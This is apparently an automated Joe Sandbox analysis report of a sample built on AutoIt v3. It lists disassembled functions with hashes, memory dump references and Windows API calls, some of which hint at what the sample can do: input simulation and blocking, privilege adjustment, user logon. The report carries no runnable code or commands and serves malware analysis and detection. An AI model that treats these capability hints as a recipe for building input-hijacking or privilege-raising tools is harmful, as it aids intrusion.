Associated: 00000000.00000002.2157105298.00000000002AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157105298.00000000002CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157155524.00000000002DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157181019.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_220000_WDpjhC3jpq.jbxd

Similarity

API ID: Find$CloseFileFirst
String ID:
API String ID: 2295610775-0
Opcode ID: 717f32d3c76940b380845d8c1839afeef8f0ff06b765d319a1eba2e8897c9345
Instruction ID: ef251c2589f9907242cc86f959deb2cc43ff8477b5d9d895c790c5a85145a144
Opcode Fuzzy Hash: 717f32d3c76940b380845d8c1839afeef8f0ff06b765d319a1eba2e8897c9345
Instruction Fuzzy Hash: C711C8716102009FDB00EF28D845A2EB3E4FF85324F00891EF8AAD7291DF30AD148F81

Function 0026CE7A Relevance: 3.0, APIs: 2, Instructions: 30windowCOMMON

Download Yara Rule

APIs

GetLastError.KERNEL32(00000000,?,00000FFF,00000000,00000016,?,0027BE6A,?,?,00000000,?), ref: 0026CEA7
FormatMessageW.KERNEL32(00001000,00000000,000000FF,00000000,?,00000FFF,00000000,00000016,?,0027BE6A,?,?,00000000,?), ref: 0026CEB9

Memory Dump Source

Source File: 00000000.00000002.2157040657.0000000000221000.00000020.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true

Associated: 00000000.00000002.2157017919.0000000000220000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157105298.00000000002AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157105298.00000000002CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157155524.00000000002DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157181019.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_220000_WDpjhC3jpq.jbxd

Similarity

API ID: ErrorFormatLastMessage
String ID:
API String ID: 3479602957-0
Opcode ID: ee08ee20aaf4cd68c39420f50ef8abe6555751d96b576d74afd212eb79e587c1
Instruction ID: f65a47513fc9ced8bf5e1061da7f2d4fe87df1d5ecf7d1142a3c4572a92fd88f
Opcode Fuzzy Hash: ee08ee20aaf4cd68c39420f50ef8abe6555751d96b576d74afd212eb79e587c1
Instruction Fuzzy Hash: 34F08231510229FBDB10AFA4DC49FFA776DBF09351F004165F915D6191D6709A54CFA0

Function 0026411C Relevance: 3.0, APIs: 2, Instructions: 29keyboardCOMMON

Download Yara Rule

APIs

SendInput.USER32(00000001,?,0000001C,?,?,00000002), ref: 00264153
keybd_event.USER32(?,7694C0D0,?,00000000), ref: 00264166

Memory Dump Source

Source File: 00000000.00000002.2157040657.0000000000221000.00000020.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true

Associated: 00000000.00000002.2157017919.0000000000220000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157105298.00000000002AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157105298.00000000002CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157155524.00000000002DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157181019.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_220000_WDpjhC3jpq.jbxd

Similarity

API ID: InputSendkeybd_event
String ID:
API String ID: 3536248340-0
Opcode ID: 66073a0821d0d424f4f503232e934c98125cb0f71f9ba1ab7602b748068217d4
Instruction ID: 8aa1f6c55ae70183508a7fb068363efc029c1bb09d6e4bba736fa24689f7a1f3
Opcode Fuzzy Hash: 66073a0821d0d424f4f503232e934c98125cb0f71f9ba1ab7602b748068217d4
Instruction Fuzzy Hash: 53F06D7081034DAFDB059FA0C809BBE7BB0EF01305F008049F9A696191D77986529FA0

Function 0025AB84 Relevance: 3.0, APIs: 2, Instructions: 22COMMON

Download Yara Rule

APIs

AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,0025ACC0), ref: 0025AB99
CloseHandle.KERNEL32(?,?,0025ACC0), ref: 0025ABAB

Memory Dump Source

Source File: 00000000.00000002.2157040657.0000000000221000.00000020.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true

Associated: 00000000.00000002.2157017919.0000000000220000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157105298.00000000002AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157105298.00000000002CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157155524.00000000002DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157181019.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_220000_WDpjhC3jpq.jbxd

Similarity

API ID: AdjustCloseHandlePrivilegesToken
String ID:
API String ID: 81990902-0
Opcode ID: deaa6c054caed967a31b066b00e7a89f6c86812c0702c02916ceb72e115eb4c7
Instruction ID: 7925412b4790b3a0df72f6e522eabc813d48bb02ab31a515d1d6d0c712d548f7
Opcode Fuzzy Hash: deaa6c054caed967a31b066b00e7a89f6c86812c0702c02916ceb72e115eb4c7
Instruction Fuzzy Hash: 31E08671410510AFE7212F14FC09D737BE9EF00320B108469F85B80830CB325CA0DF50

Function 002481AC Relevance: 3.0, APIs: 2, Instructions: 8COMMONLIBRARYCODE

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32(00000000,0000000E,00246DB3,-0000031A,?,?,00000001), ref: 002481B1
UnhandledExceptionFilter.KERNEL32(?,?,?,00000001), ref: 002481BA

Memory Dump Source

Source File: 00000000.00000002.2157040657.0000000000221000.00000020.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true

Associated: 00000000.00000002.2157017919.0000000000220000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157105298.00000000002AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157105298.00000000002CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157155524.00000000002DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157181019.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_220000_WDpjhC3jpq.jbxd

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: dd11f8328f83e4c29e362a4e807df46d57dd3666c143c2b1d6c28392c1dc54ad
Instruction ID: 7ef93d58e9aca014e6d861112944b9d618eb87d99fa5c226a1ea0e49d5036a30
Opcode Fuzzy Hash: dd11f8328f83e4c29e362a4e807df46d57dd3666c143c2b1d6c28392c1dc54ad
Instruction Fuzzy Hash: 0EB09231084608EBDF002BA1FC0DB587F68EB0A652F004090F60E448618F7254108F92

Function 0024D1B9 Relevance: 2.1, APIs: 1, Instructions: 645COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2157040657.0000000000221000.00000020.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true

Associated: 00000000.00000002.2157017919.0000000000220000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157105298.00000000002AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157105298.00000000002CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157155524.00000000002DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157181019.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_220000_WDpjhC3jpq.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 555b98279df12fa4abc96ea8beacbc2de605258adedc9474b8b2587365394ff1
Instruction ID: e6d5214fbbba5725873aefb659d9c16da04a5a65d19fcbe2b23444367c6ffcb0
Opcode Fuzzy Hash: 555b98279df12fa4abc96ea8beacbc2de605258adedc9474b8b2587365394ff1
Instruction Fuzzy Hash: 7B320431D39F418DD7279A34E866336A28CAFB73D4F15D727E819B59AAEF28C4834100

Function 002296C0 Relevance: 2.1, APIs: 1, Instructions: 573COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2157040657.0000000000221000.00000020.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true

Associated: 00000000.00000002.2157017919.0000000000220000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157105298.00000000002AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157105298.00000000002CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157155524.00000000002DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157181019.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_220000_WDpjhC3jpq.jbxd

Similarity

API ID: __itow__swprintf
String ID:
API String ID: 674341424-0
Opcode ID: 8f010e820bdf61494191713a71bd0b806ff5a24c5973c40fffc655bd42a012d5
Instruction ID: aa589046e961be2787b4563c7ff3b7e2b217d090ca9b673ec39a474382be77e1
Opcode Fuzzy Hash: 8f010e820bdf61494191713a71bd0b806ff5a24c5973c40fffc655bd42a012d5
Instruction Fuzzy Hash: F522AB71528311AFDB24DF54D890B6BB7E4BF84310F20491DF89A9B291DB71E9A4CF82

Function 0025038E Relevance: 1.8, APIs: 1, Instructions: 294COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2157040657.0000000000221000.00000020.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true

Associated: 00000000.00000002.2157017919.0000000000220000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157105298.00000000002AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157105298.00000000002CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157155524.00000000002DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157181019.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_220000_WDpjhC3jpq.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bc77d11f353d5cf4b8fef5cbaa484ba2ddbc134d6712ceca7ccace502e39a456
Instruction ID: b07876fc11657e7602e289d07f3c11a524f7f0f96f08576d59f1ed417b226c13
Opcode Fuzzy Hash: bc77d11f353d5cf4b8fef5cbaa484ba2ddbc134d6712ceca7ccace502e39a456
Instruction Fuzzy Hash: 94B11220D2AF504DD323A6389875336B65CAFBB3D5F91DB1BFC2A74D22EB2185834180

Function 0026B6CC Relevance: 1.6, APIs: 1, Instructions: 71COMMON

Download Yara Rule

APIs

__time64.LIBCMT ref: 0026B6DF

Part of subcall function 0024344A: GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,0026BDC3,00000000,?,?,?,?,0026BF70,00000000,?), ref: 00243453
Part of subcall function 0024344A: __aulldiv.LIBCMT ref: 00243473

Memory Dump Source

Source File: 00000000.00000002.2157040657.0000000000221000.00000020.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true

Associated: 00000000.00000002.2157017919.0000000000220000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157105298.00000000002AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157105298.00000000002CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157155524.00000000002DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157181019.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_220000_WDpjhC3jpq.jbxd

Similarity

API ID: Time$FileSystem__aulldiv__time64
String ID:
API String ID: 2893107130-0
Opcode ID: 015e12e8c818a41d1580215ae3ffe46c7d9e54ca8babb1347f687f936d15b88e
Instruction ID: 9e9a32cbbd9893e16788779a79477366b42bfdffd0b934beb0cad28554bd3d62
Opcode Fuzzy Hash: 015e12e8c818a41d1580215ae3ffe46c7d9e54ca8babb1347f687f936d15b88e
Instruction Fuzzy Hash: 1821D572634511CBC71ACF28D481A92F7E0EB95311B248E6DE0E5CF2C0CB34B955CB94

Function 00276AAF Relevance: 1.5, APIs: 1, Instructions: 25keyboardCOMMON

Download Yara Rule

APIs

BlockInput.USER32(00000001), ref: 00276ACA

Memory Dump Source

Source File: 00000000.00000002.2157040657.0000000000221000.00000020.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true

Associated: 00000000.00000002.2157017919.0000000000220000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157105298.00000000002AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157105298.00000000002CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157155524.00000000002DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157181019.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_220000_WDpjhC3jpq.jbxd

Similarity

API ID: BlockInput
String ID:
API String ID: 3456056419-0
Opcode ID: e37053c384f24b9bf4ba42a09c9e80b433068a5c3df582132bea59994126556d
Instruction ID: 971481da1b9b10ece01a4469e6d8a4b53e758a3ca774c8c404a85ee8c8977028
Opcode Fuzzy Hash: e37053c384f24b9bf4ba42a09c9e80b433068a5c3df582132bea59994126556d
Instruction Fuzzy Hash: E4E04835220214AFC700EF99E408D56B7EDAF74751F04C816F949D7251DAB0F8148BA0

Function 002674BB Relevance: 1.5, APIs: 1, Instructions: 24COMMON

Download Yara Rule

APIs

mouse_event.USER32(00000002,00000000,00000000,00000000,00000000), ref: 002674DE

Memory Dump Source

Source File: 00000000.00000002.2157040657.0000000000221000.00000020.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true

Associated: 00000000.00000002.2157017919.0000000000220000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157105298.00000000002AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157105298.00000000002CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157155524.00000000002DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157181019.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_220000_WDpjhC3jpq.jbxd

Similarity

API ID: mouse_event
String ID:
API String ID: 2434400541-0
Opcode ID: 463015bebd3528104359d447dfb9ed6baa655c6ff6b9adb20527e78c75d11491
Instruction ID: 7a2bdbaed04246ad7312a509b77794596311ab4bde9fdce1a3a8e99c64e78190
Opcode Fuzzy Hash: 463015bebd3528104359d447dfb9ed6baa655c6ff6b9adb20527e78c75d11491
Instruction Fuzzy Hash: 17D05EA057C30679EC280B24BC0FF7A1A28F3007C8FC08289B082C94C1FCC058E1A132

Function 0025B106 Relevance: 1.5, APIs: 1, Instructions: 18COMMON

Download Yara Rule

APIs

LogonUserW.ADVAPI32(?,00000001,?,?,00000000,0025AD3E), ref: 0025B124

Memory Dump Source

Source File: 00000000.00000002.2157040657.0000000000221000.00000020.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true

Associated: 00000000.00000002.2157017919.0000000000220000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157105298.00000000002AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157105298.00000000002CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157155524.00000000002DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157181019.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_220000_WDpjhC3jpq.jbxd

Similarity

API ID: LogonUser
String ID:
API String ID: 1244722697-0
Opcode ID: 9acc658019d02cb7230d0866444b2016e812223a2d0af1a8858da38c9c8969f6
Instruction ID: a5e441eabe2124a794e153f3d08767eb36768412d88720cba33efc3307d2f68c
Opcode Fuzzy Hash: 9acc658019d02cb7230d0866444b2016e812223a2d0af1a8858da38c9c8969f6
Instruction Fuzzy Hash: 3DD05E320A460EAFDF024FA4EC06EAE3F6AEB04700F408110FA12C50A0C671D531AB50

Function 0029B340 Relevance: 1.5, APIs: 1, Instructions: 7COMMON

Download Yara Rule

APIs

GetUserNameW.ADVAPI32 ref: 0029B352

Memory Dump Source

Source File: 00000000.00000002.2157040657.0000000000221000.00000020.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true

Associated: 00000000.00000002.2157017919.0000000000220000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157105298.00000000002AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157105298.00000000002CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157155524.00000000002DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157181019.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_220000_WDpjhC3jpq.jbxd

Similarity

API ID: NameUser
String ID:
API String ID: 2645101109-0
Opcode ID: 7f6915d302b53656d6387bf16454910d1c8b001cb5b12edb90e400dcb295742a
Instruction ID: b7ee5fabbc330ea619353fabeb9790d6ab0437ae99f8b08ac3ae4ab4f5710834
Opcode Fuzzy Hash: 7f6915d302b53656d6387bf16454910d1c8b001cb5b12edb90e400dcb295742a
Instruction Fuzzy Hash: FAC04CB1410109DFCB51CBC0D948AEEB7BCAB04301F104092A106F1110DB709B859B72

Function 00248189 Relevance: 1.5, APIs: 1, Instructions: 6COMMON

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32(?), ref: 0024818F

Memory Dump Source

Source File: 00000000.00000002.2157040657.0000000000221000.00000020.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true

Associated: 00000000.00000002.2157017919.0000000000220000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157105298.00000000002AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157105298.00000000002CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157155524.00000000002DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157181019.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_220000_WDpjhC3jpq.jbxd

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: fc847bd42b568eebca93653848b0687314c88febc47d766f9c8ad0e5e54255bb
Instruction ID: 8ae561fb387e4e21e98a06f1eae05f84a4e9f9dc46735bd7bab86f97ad71cbe3
Opcode Fuzzy Hash: fc847bd42b568eebca93653848b0687314c88febc47d766f9c8ad0e5e54255bb
Instruction Fuzzy Hash: F1A0013108420CAB8F012B96FC098997F6DEA466A5B5440A1F90E459219B62A9619A96

Function 0022E3B0 Relevance: .5, Instructions: 540COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2157040657.0000000000221000.00000020.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true

Associated: 00000000.00000002.2157017919.0000000000220000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157105298.00000000002AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157105298.00000000002CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157155524.00000000002DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157181019.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_220000_WDpjhC3jpq.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8615dbe9e52c5f39453174201a296f69b28b788a8cc24773e497dd213e5c2802
Instruction ID: 16c12abfd0d120add4d0244f767916365886e87bbe1c259bf63f9799b34ec480
Opcode Fuzzy Hash: 8615dbe9e52c5f39453174201a296f69b28b788a8cc24773e497dd213e5c2802
Instruction Fuzzy Hash: A122D170920226EFDF24DF94E480ABEB7B0FF14304F158069E94A9B351E375ADA1DB91

Function 002293F0 Relevance: .5, Instructions: 531COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2157040657.0000000000221000.00000020.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true

Associated: 00000000.00000002.2157017919.0000000000220000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157105298.00000000002AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157105298.00000000002CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157155524.00000000002DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157181019.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_220000_WDpjhC3jpq.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 588f4ef3012bab2efdb7250a0a53248ee3b59c64c5b66dae4066e34b573fa7f4
Instruction ID: a168ce6f1a7a5039387e76e7c2ecf1955a4f13386ca25a248a37bcd55e851712
Opcode Fuzzy Hash: 588f4ef3012bab2efdb7250a0a53248ee3b59c64c5b66dae4066e34b573fa7f4
Instruction Fuzzy Hash: 4B126D70A10219EFDF14DFA4E985AEEB7F9FF48300F204529E406E7654EB36A964CB50

Function 0022AF50 Relevance: .5, Instructions: 514COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2157040657.0000000000221000.00000020.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true

Associated: 00000000.00000002.2157017919.0000000000220000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157105298.00000000002AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157105298.00000000002CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157155524.00000000002DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157181019.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_220000_WDpjhC3jpq.jbxd

Similarity

API ID: Exception@8Throwstd::exception::exception
String ID:
API String ID: 3728558374-0
Opcode ID: 259a9a23a2f2931c37435b1e5dfc3950dda4f2129208ad1345ca77e1db784e35
Instruction ID: 87e9c608d9b90a8c6f0882014c60642bc6f3e6f37a75d2495cb35e4224b862b7
Opcode Fuzzy Hash: 259a9a23a2f2931c37435b1e5dfc3950dda4f2129208ad1345ca77e1db784e35
Instruction Fuzzy Hash: 2E02C3B1E20115EFDF15DFA4E991AAEB7B5FF44300F108069E806DB255EB31DA24CB91

Function 002402A4 Relevance: .3, Instructions: 345COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2157040657.0000000000221000.00000020.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true

Associated: 00000000.00000002.2157017919.0000000000220000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157105298.00000000002AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157105298.00000000002CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157155524.00000000002DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157181019.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_220000_WDpjhC3jpq.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6bcf19402166b509fafb4c50a64371ef2a93877f8d810bfc08732e8a9195a1a8
Instruction ID: 982d07a3c1f8abc3b57d9416e37aedbc24060305241af424995cafc62156ae82
Opcode Fuzzy Hash: 6bcf19402166b509fafb4c50a64371ef2a93877f8d810bfc08732e8a9195a1a8
Instruction Fuzzy Hash: 70C1C5722251930ADF6D4E3985B443EBEA15EA17B171A076DD8B3CB4D2EF30C574E620

Function 002406D9 Relevance: .3, Instructions: 341COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2157040657.0000000000221000.00000020.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true

Associated: 00000000.00000002.2157017919.0000000000220000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157105298.00000000002AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157105298.00000000002CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157155524.00000000002DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157181019.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_220000_WDpjhC3jpq.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2d76c3bdd49f8e00aad6e71f29a941d673537f809e9b181fbd8d4251c6dfdf40
Instruction ID: 115025e7c098c17ee8d21b73100926074a99d5198924e30184e2d38c51ce6eb1
Opcode Fuzzy Hash: 2d76c3bdd49f8e00aad6e71f29a941d673537f809e9b181fbd8d4251c6dfdf40
Instruction Fuzzy Hash: 02C1F3732251A309DF6D4A39C5B443EFAA15EA2BB170A076DD4B3CB0D6EF20C574E620

Function 0023FA57 Relevance: .3, Instructions: 323COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2157040657.0000000000221000.00000020.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true

Associated: 00000000.00000002.2157017919.0000000000220000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157105298.00000000002AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157105298.00000000002CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157155524.00000000002DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157181019.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_220000_WDpjhC3jpq.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
Instruction ID: 3940e642944993b4a231da5c1a47d34612e4a04502fb548d3171420b3607bbad
Opcode Fuzzy Hash: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
Instruction Fuzzy Hash: 3DC1F6B262509309DF9D4A39E63443EFAA15AA1BB1B0A077DD4B2CB5D6EF10C534D620

Function 0027A2A9 Relevance: 77.5, APIs: 40, Strings: 4, Instructions: 490filecommemoryCOMMON

Download Yara Rule

APIs

DeleteObject.GDI32(00000000), ref: 0027A2FE
DeleteObject.GDI32(00000000), ref: 0027A310
DestroyWindow.USER32 ref: 0027A31E
GetDesktopWindow.USER32 ref: 0027A338
GetWindowRect.USER32(00000000), ref: 0027A33F
SetRect.USER32(?,00000000,00000000,000001F4,00000190), ref: 0027A480
AdjustWindowRectEx.USER32(?,88C00000,00000000,00000002), ref: 0027A490
CreateWindowExW.USER32(00000002,AutoIt v3,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0027A4D8
GetClientRect.USER32(00000000,?), ref: 0027A4E4
CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,00000000,00000000,00000000), ref: 0027A51E
CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0027A540
GetFileSize.KERNEL32(00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0027A553
GlobalAlloc.KERNEL32(00000002,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0027A55E
GlobalLock.KERNEL32(00000000), ref: 0027A567
ReadFile.KERNEL32(00000000,00000000,00000000,00000190,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0027A576
GlobalUnlock.KERNEL32(00000000), ref: 0027A57F
CloseHandle.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0027A586
GlobalFree.KERNEL32(00000000), ref: 0027A591
CreateStreamOnHGlobal.OLE32(00000000,00000001,88C00000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0027A5A3
OleLoadPicture.OLEAUT32(88C00000,00000000,00000000,002AD9BC,00000000), ref: 0027A5B9
